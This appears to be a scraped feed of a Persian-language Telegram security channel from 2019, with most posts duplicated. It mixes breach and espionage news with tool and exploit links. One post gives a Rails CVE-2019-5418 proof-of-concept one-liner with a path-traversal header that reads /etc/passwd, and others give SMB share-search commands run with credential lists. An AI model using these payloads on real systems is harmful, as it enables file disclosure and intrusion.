مخفی کردن بکدور در سیستم با روش سازمان CIA
https://vanmieghem.io/persisting-like-a-cia-agent/
#windows
#backdoor
#presistent
@sec_nerd
https://vanmieghem.io/persisting-like-a-cia-agent/
#windows
#backdoor
#presistent
@sec_nerd
امنیت اطلاعات
شرکت کسپرسکای به تازگی گروهی از هکرها را شناسایی کرده است که حداقل از سال ۲۰۱۲ در حال فعالیت بوده و شناخته نشده اند! این گروه از بدافزار پیشرفته ای به نام Slingshot استفاده میکنند و با کشف آسیب پذیریهای ناشناخته در میکروتیک در فاز اول حملات خود این برنامه…
عملیات سایبری و کمپین بدافزاری که با نام slingshot شناسایی شد، عملیات امریکا علیه داعش بوده است!
عملیات مذکور در ستاد فرماندهی عملیات ویژه ارتش امریکا انجام شده است (استفاده از هکرها محدود به cia و nsa نیست!)
به گفته ی کسپرسکی این کمپین یکی از پیچیده ترین کمپین های موجود است که بازیگران آن بسیار ماهر بوده و هویت خود را به خوبی مخفی کرده اند و این کار مطالعه بر روی slingshot را بسیار مشکل کرده است.
البته این گزارش باعث برملا شدن عملیات مخفیانه امریکا علیه اهدافش در غرب آسیا شد و کسپرسکی دانسته یا ندانسته تلاش های ۶ ساله ی امریکا را به هدر داد.
توضیحات بیشتر:
https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/
#news
#kaspersky
#slingshot
#russia
#usa
#isis
@sec_nerd
عملیات مذکور در ستاد فرماندهی عملیات ویژه ارتش امریکا انجام شده است (استفاده از هکرها محدود به cia و nsa نیست!)
به گفته ی کسپرسکی این کمپین یکی از پیچیده ترین کمپین های موجود است که بازیگران آن بسیار ماهر بوده و هویت خود را به خوبی مخفی کرده اند و این کار مطالعه بر روی slingshot را بسیار مشکل کرده است.
البته این گزارش باعث برملا شدن عملیات مخفیانه امریکا علیه اهدافش در غرب آسیا شد و کسپرسکی دانسته یا ندانسته تلاش های ۶ ساله ی امریکا را به هدر داد.
توضیحات بیشتر:
https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/
#news
#kaspersky
#slingshot
#russia
#usa
#isis
@sec_nerd
CyberScoop
Kaspersky's 'Slingshot' report burned an ISIS-focused intelligence operation
CyberScoop has learned that Kaspersky's 'Slingshot' is an active, U.S.-led counterterrorism cyber-espionage operation used to target ISIS and Al-Qaeda.
کشف دایرکتوری ها، فایلها و DNSها با ابزار GoBuster
https://www.darknet.org.uk/2019/02/gobuster-directory-file-dns-busting-tool-in-go/
#web
#pentest
#fuzz
@sec_nerd
https://www.darknet.org.uk/2019/02/gobuster-directory-file-dns-busting-tool-in-go/
#web
#pentest
#fuzz
@sec_nerd
دیتابیس تعدادی از افراد حقیقی و حقوقی از داوجونز به سرقت رفت.
این دیتابیس که از نوع elasticsearch بوده و بر روی یکی از سرورهای آمازون قرار داشت حاوی اطلاعات بیش از 2.4 میلیون شخص و سازمان بود.
دیتابیس مذکور حاوی اطلاعاتی از مشتریان پرخطر از جمله سیاستمداران، مجرمان و تروریست ها بوده است.
https://techcrunch.com/2019/02/27/dow-jones-watchlist-leak/
#news
#breach
#elasticsearch
#nosql
@sec_nerd
این دیتابیس که از نوع elasticsearch بوده و بر روی یکی از سرورهای آمازون قرار داشت حاوی اطلاعات بیش از 2.4 میلیون شخص و سازمان بود.
دیتابیس مذکور حاوی اطلاعاتی از مشتریان پرخطر از جمله سیاستمداران، مجرمان و تروریست ها بوده است.
https://techcrunch.com/2019/02/27/dow-jones-watchlist-leak/
#news
#breach
#elasticsearch
#nosql
@sec_nerd
TechCrunch
Dow Jones’ watchlist of 2.4 million high-risk individuals has leaked
A watchlist of risky individuals and corporate entities owned by Dow Jones has been exposed, after a company with access to the database left it on a server without a password.
This media is not supported in your browser
VIEW IN TELEGRAM
کد اکسپلویت جدید برای وردپرس با شناسه های CVE-2019-8942 و CVE-2019-8943
https://gist.github.com/allyshka/f159c0b43f1374f87f2c3817d6401fd6
#wordpress
#wp
#exploit
#rce
#web
#php
@sec_nerd
https://gist.github.com/allyshka/f159c0b43f1374f87f2c3817d6401fd6
#wordpress
#wp
#exploit
#rce
#web
#php
@sec_nerd
1) pip3 install -r requirements.txt
sudo apt-get install cifs-utils
2) git clone https://github.com/nikallass/sharesearch.git
3) python3 https://sharesearch.py -p all -w -v -H hosts.lst -C creds.lst
#privesc
#smb
@sec_nerd
sudo apt-get install cifs-utils
2) git clone https://github.com/nikallass/sharesearch.git
3) python3 https://sharesearch.py -p all -w -v -H hosts.lst -C creds.lst
#privesc
#smb
@sec_nerd
نمایش متاسپلویت در مستند جنجالی صداوسیما .
اذعان به توان شنود واتس اپ در مستند مذکور!
(لینک ویدیوی کامل)
https://www.youtube.com/watch?v=jThOWaXKS70
#iran
#whatsapp
@sec_nerd
اذعان به توان شنود واتس اپ در مستند مذکور!
(لینک ویدیوی کامل)
https://www.youtube.com/watch?v=jThOWaXKS70
#iran
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
ابزاری که بر اساس خروجی systeminfo آسیب پذیری های احتمالی موجود در سیستم ویندوزی را لیست میکند.
https://github.com/bitsadmin/wesng
#windows
#privesc
#exploit
@sec_nerd
https://github.com/bitsadmin/wesng
#windows
#privesc
#exploit
@sec_nerd
باج افزار جدیدی که با آسیب پذیری winrar با شناسه CVE-2018-20250 منتشر میشود!
نام فایل: vk_4221345.rar
#ransomware
#news
#winrar
@sec_nerd
نام فایل: vk_4221345.rar
#ransomware
#news
#winrar
@sec_nerd
یک روزنامه سعودی گزارش داد هکرهای ایرانی موفق شدند گوشی های همراه همسر و پسر نتانیاهو را هک کنند!
البته این خبر از سوی دفتر نتانیاهو تکذیب شده است اما Karine Elharar یکی از اعضای Yesh Atid (حزب مرکزی) در توییتی به نتانیاهو کنایه زده و ضعف او در حفظ حریم خانوادگی خود را مورد تمسخر قرار داده است.
گویا این حمله چند ماه پیش انجام شده و مشخص نیست چه اطلاعاتی از این دو فرد به دست هکرهای ایرانی افتاده است.
https://www.independentarabia.com/node/13286/%D8%A7%D9%84%D8%A3%D8%AE%D8%A8%D8%A7%D8%B1/%D8%A7%D9%84%D8%B4%D8%B1%D9%82-%D8%A7%D9%84%D8%A3%D9%88%D8%B3%D8%B7/%D9%87%D9%84-%D8%AA%D9%86%D8%B5%D8%AA%D8%AA-%D8%A5%D9%8A%D8%B1%D8%A7%D9%86-%D8%B9%D9%84%D9%89-%D9%86%D8%AA%D9%86%D9%8A%D8%A7%D9%87%D9%88-%D8%A8%D9%88%D8%A7%D8%B3%D8%B7%D8%A9-%D9%87%D8%A7%D8%AA%D9%81%D9%8A-%D8%B2%D9%88%D8%AC%D8%AA%D9%87-%D9%88%D8%A7%D8%A8%D9%86%D9%87-%D9%8A%D8%A7%D8%A6%D9%8A%D8%B1%D8%9F
https://www.jpost.com/Arab-Israeli-Conflict/Saudi-report-Iranians-hacked-the-phones-of-Yair-and-Sara-Netanyahu-583909
#iran
#israel
#news
#breach
@sec_nerd
البته این خبر از سوی دفتر نتانیاهو تکذیب شده است اما Karine Elharar یکی از اعضای Yesh Atid (حزب مرکزی) در توییتی به نتانیاهو کنایه زده و ضعف او در حفظ حریم خانوادگی خود را مورد تمسخر قرار داده است.
گویا این حمله چند ماه پیش انجام شده و مشخص نیست چه اطلاعاتی از این دو فرد به دست هکرهای ایرانی افتاده است.
https://www.independentarabia.com/node/13286/%D8%A7%D9%84%D8%A3%D8%AE%D8%A8%D8%A7%D8%B1/%D8%A7%D9%84%D8%B4%D8%B1%D9%82-%D8%A7%D9%84%D8%A3%D9%88%D8%B3%D8%B7/%D9%87%D9%84-%D8%AA%D9%86%D8%B5%D8%AA%D8%AA-%D8%A5%D9%8A%D8%B1%D8%A7%D9%86-%D8%B9%D9%84%D9%89-%D9%86%D8%AA%D9%86%D9%8A%D8%A7%D9%87%D9%88-%D8%A8%D9%88%D8%A7%D8%B3%D8%B7%D8%A9-%D9%87%D8%A7%D8%AA%D9%81%D9%8A-%D8%B2%D9%88%D8%AC%D8%AA%D9%87-%D9%88%D8%A7%D8%A8%D9%86%D9%87-%D9%8A%D8%A7%D8%A6%D9%8A%D8%B1%D8%9F
https://www.jpost.com/Arab-Israeli-Conflict/Saudi-report-Iranians-hacked-the-phones-of-Yair-and-Sara-Netanyahu-583909
#iran
#israel
#news
#breach
@sec_nerd
اندبندنت عربية
هل تنصتت إيران على نتانياهو بواسطة هاتفي زوجته وابنه يائير؟
في اعقاب الكشف عن خرق إيراني لهاتف بيني غانتس رئيس الأركان السابق والمرشح لرئاسة الحكومة في إسرائيل يتضح أيضا من معلومات حصلت عليها "اندبندنت عربية" أن إيران كانت خرقت قبل فترة ليست بالبعيدة هاتفي
حزب آبی و سفید اسراییل از دادستان این رژیم خواست در خصوص نحوه لو رفتن اطلاعات مرتبط با نفوذ ایرانی ها به تلفن همراه رهبر این حزب اسراییلی به نام Benny Gantz تحقیق کند.
به نظر این حزب، انتشار اخبار مرتبط با این موضوع در ایام نزدیک به انتخابات این رژیم از کانال ۱۲ اسراییل بر روی روند انتخابات تاثیر خواهد گذاشت.
گانتز که پیش از این وزیر جنگ اسراییل بود پنج هفته پیش از سوی آژانس امنیت اسراییل مطلع شد که هک شده است. این نفوذ پنج ماه پیش رخ داده و اطلاعات فردی و پیام های کوتاه از گوشی گانتز به سرقت رفته اند.
اطلاعات بیشتر:
https://www.jta.org/quick-reads/leak-of-alleged-iranian-hack-into-benny-gantz-personal-phone-could-affect-election-outcome
#news
#iran
#israel
#breach
@sec_nerd
به نظر این حزب، انتشار اخبار مرتبط با این موضوع در ایام نزدیک به انتخابات این رژیم از کانال ۱۲ اسراییل بر روی روند انتخابات تاثیر خواهد گذاشت.
گانتز که پیش از این وزیر جنگ اسراییل بود پنج هفته پیش از سوی آژانس امنیت اسراییل مطلع شد که هک شده است. این نفوذ پنج ماه پیش رخ داده و اطلاعات فردی و پیام های کوتاه از گوشی گانتز به سرقت رفته اند.
اطلاعات بیشتر:
https://www.jta.org/quick-reads/leak-of-alleged-iranian-hack-into-benny-gantz-personal-phone-could-affect-election-outcome
#news
#iran
#israel
#breach
@sec_nerd
Jewish Telegraphic Agency
Leak of alleged Iranian hack into Benny Gantz's personal phone could affect election outcome - Jewish Telegraphic Agency
The Blue and White party has asked Israel's attorney general to investigate the link, claiming that it could only have come from the Prime Minister's Office.
یک شبکه تلویزیونی اسراییلی گزارش داد اطلاعات کامپیوتر شخصی و تلفن ایهود باراک، نخست وزیر سابق اسراییل توسط هکرها به سرقت رفت و به ایران فروخته شد.
مسئول آژانس امنیت اسراییل شش ماه پیش این موضوع را به باراک اطلاع داده بود.
https://www.cjnews.com/news/israel/ehud-baraks-cell-phone-and-personal-computer-hacked-information-sold-to-iran
#news
#iran
#israel
#breach
@sec_nerd
مسئول آژانس امنیت اسراییل شش ماه پیش این موضوع را به باراک اطلاع داده بود.
https://www.cjnews.com/news/israel/ehud-baraks-cell-phone-and-personal-computer-hacked-information-sold-to-iran
#news
#iran
#israel
#breach
@sec_nerd
The Canadian Jewish News
Ehud Barak’s cell phone and personal computer hacked; information sold to Iran
The cell phone and personal computer of former Israeli prime minister Ehud Barak were hacked and the information sold to Iran, an Israeli television news channel reported.
Ruby on Rails CVE-2019-5418 tweet-PoC
curl -sL https://goo.gl/NFR6fJ > /tmp/NFR6fJ; docker build -f /tmp/NFR6fJ -t 2019-5418 .; docker run -d --name 2019-5418 -p3000:3000 2019-5418; sleep 4; curl -H 'Accept: ../../../../../../../../etc/passwd{{' 'https://localhost:3000/robots';
#ruby
#pentest
#exploit
@sec_nerd
curl -sL https://goo.gl/NFR6fJ > /tmp/NFR6fJ; docker build -f /tmp/NFR6fJ -t 2019-5418 .; docker run -d --name 2019-5418 -p3000:3000 2019-5418; sleep 4; curl -H 'Accept: ../../../../../../../../etc/passwd{{' 'https://localhost:3000/robots';
#ruby
#pentest
#exploit
@sec_nerd
یَا مُقَلِّبَ الْقُلُوبِ وَ الْأَبْصَارِ
یَا مُدَبِّرَ اللَّیْلِ وَ النَّهَار
یَا مُحَوِّلَ الْحَوْلِ وَ الْأَحْوَالِ
حَوِّلْ حَالَنَا
إِلَی أَحْسَنِ الْحَال
سال ۹۸ بر تمامی همراهان مبارکباد
@sec_nerd
یَا مُدَبِّرَ اللَّیْلِ وَ النَّهَار
یَا مُحَوِّلَ الْحَوْلِ وَ الْأَحْوَالِ
حَوِّلْ حَالَنَا
إِلَی أَحْسَنِ الْحَال
سال ۹۸ بر تمامی همراهان مبارکباد
@sec_nerd